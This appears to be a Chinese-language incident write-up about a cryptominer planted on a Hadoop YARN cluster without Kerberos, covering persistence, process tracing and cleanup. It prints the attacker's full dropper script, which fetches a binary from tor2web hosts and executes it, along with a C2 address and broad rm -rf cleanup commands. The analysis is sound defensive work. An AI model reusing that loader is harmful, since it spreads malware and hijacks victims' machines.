目录

挖矿病毒

1 OverView

2 矿毒

2.1 intelbagjop7nzm5.tor2web.io/cmd

  • 最近发现内网hadoop yarn未加Kerberos集群被攻陷.

特征如下,初步认为是有程序进入内网,扫描yarn服务,远程提交job.部署挖矿毒瘤

[yarn@~]$ crontab  -l
0 * * * * ~/.systemd-init
# 可以进程如下
yarn      4831  4829  0 10:15 ?        00:00:00 wget -t1 -T180 -qU- -O- --no-check-certificate intelbagjop7nzm5.tor2web.io/cmd

#实际运行进程名称
24469 yarn      20   0   20764  13664      0 S 695.7  0.0  45981:55 a0rhEv

# /tmp 文件夹下会有类似文件夹
drwxrwxrwt.  2 root         root             6 8月  26 2016 .Test-unix
drwxrwxrwt.  2 root         root            22 8月  28 19:33 .X11-unix
-rw-r--r--.  1 yarn         yarn             2 9月   2 10:18 .XImunix
-rw-r--r--.  1 yarn         yarn             2 9月   2 10:18 .XIMunix
drwxrwxrwt.  2 root         root             6 8月  26 2016 .XIM-unix

[root@~]$ pwdx 24469
24469: /var/lib/hadoop-yarn


# 然后插件.systemd-init这个文件已经不存在了
# 然后便尝试追查wget进程所下载的内容
$wget -t1 -T180 -qU- -O- --no-check-certificate intelbagjop7nzm5.tor2web.io/cmd

#脚本如下
cd /dev/shm
chmod +x ~/.systemd* /lib/systemd/systemd-init


x() {
	f=/cpu
	d=./$(date|md5sum|cut -f1 -d" ")
	wget -t1 -T180 -qU- --no-check-certificate $1$f -O$d || curl -m180 -fsSLkA- $1$f -o$d
	chmod +x $d;$d;rm -f $d
}



for h in tor2web.io d2web.org xxx.in.net xxx.sh
do
	if ! ls /proc/$(cat /tmp/.X11-unix/1)/io; then
		x intelbagjop7nzm5.$h
	else
		break
	fi
done

#尝试执行脚本,会检测主进程id如果已存在就回退出
sh -x /tmp/a
+ cd /dev/shm
+ chmod +x '/var/lib/hadoop-yarn/.systemd*' /lib/systemd/systemd-init
chmod: 无法访问"/var/lib/hadoop-yarn/.systemd*": 没有那个文件或目录
chmod: 无法访问"/lib/systemd/systemd-init": 没有那个文件或目录
+ for h in tor2web.io d2web.org oxxxn.in.net oxxxn.sh
++ cat /tmp/.X11-unix/1
+ ls /proc/24469/io
/proc/24469/io
+ break

#删掉主进程pid文件,
[yarn@ shm]$ rm -rf /tmp/.X11-unix/1
#在执行脚本,便会执行download操作,重新启动进程生成一个新的pid文件
[yarn@ shm]$ sh -x /tmp/a
+ cd /dev/shm
+ chmod +x '/var/lib/hadoop-yarn/.systemd*' /lib/systemd/systemd-init
chmod: 无法访问"/var/lib/hadoop-yarn/.systemd*": 没有那个文件或目录
chmod: 无法访问"/lib/systemd/systemd-init": 没有那个文件或目录
+ for h in tor2web.io d2web.org oxxxn.in.net oxxxn.sh
++ cat /tmp/.X11-unix/1
cat: /tmp/.X11-unix/1: 没有那个文件或目录
+ ls /proc//io
ls: 无法访问/proc//io: 没有那个文件或目录
+ x intelbagjop7nzm5.tor2web.io
+ f=/cpu
++ date
++ md5sum
++ cut -f1 '-d '
+ d=./95b7c0b667f8f3e15d2cc29f93a8fdba
+ wget -t1 -T180 -qU- --no-check-certificate intelbagjop7nzm5.tor2web.io/cpu -O./95b7c0b667f8f3e15d2cc29f93a8fdba
+ chmod +x ./95b7c0b667f8f3e15d2cc29f93a8fdba
+ ./95b7c0b667f8f3e15d2cc29f93a8fdba
+ rm -f ./95b7c0b667f8f3e15d2cc29f93a8fdba
+ for h in tor2web.io d2web.org xxxx.in.net xxx.sh
++ cat /tmp/.X11-unix/1
+ ls /proc/25084/io
/proc/25084/io
+ break


#这样就得到了脚本的下载地址,
$wget -t1 -T180 -qU- --no-check-certificate intelbagjop7nzm5.tor2web.io/cpu -O./95b7c0b667f8f3e15d2cc29f93a8fdba

ll
总用量 260
-rw-r--r--. 1 root root 263288 1月   1 2018 95b7c0b667f8f3e15d2cc29f93a8fdba

vim  95b7c0b667f8f3e15d2cc29f93a8fdba

$ file 95b7c0b667f8f3e15d2cc29f93a8fdba
95b7c0b667f8f3e15d2cc29f93a8fdba: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
rm -rf  /tmp/.*

# 可以查到对方服务器以及端口31.192.226.123:8080
# netstat  -anp|grep 24469
tcp        0      0 10.10.10.1:29880      31.192.226.123:8080     ESTABLISHED 24469/a0rhEv

netstat  -anp|grep 25084
tcp        0      0 10.10.10.1:29310      31.192.226.123:8080     ESTABLISHED 25084/RtVeLC


# 31-192-226-123-static.serverhotell.net:webcache
a0rhEv    24469 30600         yarn    0u     IPv4          314644388       0t0        TCP xxxx.net:29880->31-192-226-123-static.serverhotell.net:webcache (ESTABLISHED)

-w578

2.2 清理

for i in `cat  /tmp/.X11-unix/*`
do
    kill -9 $i
done

rm -rf /tmp/.X*
rm -rf /var/spool/cron/yarn